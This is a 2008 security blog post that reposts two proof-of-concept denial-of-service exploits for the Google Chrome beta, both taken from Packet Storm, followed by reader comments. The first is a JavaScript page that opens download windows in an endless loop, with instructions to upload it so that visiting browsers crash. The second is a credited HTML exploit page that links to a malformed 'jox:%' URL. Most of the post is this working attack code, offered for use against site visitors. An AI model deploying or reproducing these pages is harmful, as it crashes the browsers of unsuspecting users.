Another advisories on Google Chrome’s vulnerability have been released within few days ago , it seems like there are a lot of security researchers out there trying to find any security flaw on this, brand new Google Chrome Browser ! This post is still related to my Google Chrome 0day article anyway. Well , I just took my daily rss-reading on Packetstormsecurity , and found 2 Advisories on Google Chrome Browser released almost in the same time!
Anyway , here they are :
Google Chrome Crash Script
IMC GrahamPhisher.comShoutz
IMC Security Team
IMC Tully
IMC EXE
Shouts To Everyone On The Forums
InsaneMasterminds.comGoogle’s new web browser Google Chrome will download files without
the user permission. So I came up with a script that will download
a file over and over again causing Google Chrome Beta to crash.First start off by making a document called crash.html, Than add the
following script to the document.<SCRIPT LANGUAGE=”JavaScript”>
document.write
{
var iCounter = 0
while (true)
{
window.open(”owned.zip”,”Grahamizgod” + iCounter,”width=1,height=1,resizable=no”)
iCounter++
}
}
</script>Than save the file, create a zip file called owned and just putta
buncha stuff in it. Than upload the page and than when someone
vists that page, Google chrome will give the error, “Google Chrome,original source : http://packetstormsecurity.org/0809-exploits/google-chrome-dos1.txt
And the second one :
<!———————————————–
| |
| Vulnerability discovered by Rishi Narang |
| |
| Exploit by LiquidWorm, September 2008 |
| |
| http://www.zeroscience.org |
| |
| liquidworm [t00t] gmail.com |
| |
————————————————><html>
<title>Google Chrome DoS Exploit</title>
<head>
<br />
<br /><script type=”text/javascript”>
alert(”Google Chrome Browser 0.2.149.27 Denial of Service Exploit”);
var box = confirm(”Press OK to start exploitationnPress Cancel to skip exploitation”);
if (box == true)
{
document.write(”Just point to the hyperlink… <a href=”jox:%”><strong>HERE</strong></a>”);
}else { alert(”Ok Dude!”); window.location.href = “http://www.zeroscience.org”; }
</script>
</head>
</html>
Woah! Google Chrome has crashed. Restart now?”
original source : http://packetstormsecurity.org/0809-exploits/google-chrome-dos2.txt
If you found any other security flaws on google chrome , plz let me know bout it 
Google Chrome Browser Crash Script - proof of concept is posted on September 5th, 2008 by admin. This post is filed under: Security, exploits, secInfo, Google Chrome, Google Chrome 0day, Google Chrome advisory .
Some people come to this post with this search term: crash script, google chrome.zip, browser crash, woah google chrome has crashed, google chrome zip, chrome browser crash, google, www.lifedork.com, google chrome crash, crash Google Chrome, download google Chrome.zip, lifedork, google chrome has crashed, woah! google chrome has crashed, "woah google chrome has crashed", google chrome crashes on start, browser crash script, google chrome crashes, google chrome scripting, woah google chrome crashed,
And here is the related entries of this post:
[...] interesting topic nowadays. This is the 4th post about Google chrome on this blog after this and that. I haven’t been aware of the new Google Chrome ’s Term of Service at all after I read [...]
there are so many advantages and features with Chrome, such as it’s speed, for example; now if only they would take care it’s quirky cookie management…
[...] Google Chrome Browser Crash Script - proof of concept [...]
You can also use this JavaScript library to detect any browser including chrome. Not only this, you can trim a string, detect mouse positions etc
http://rochakchauhan.com/blog/2008/10/11/rochakjs-javascript-class-of-common-functions/
hah… it’s simple but very dangerous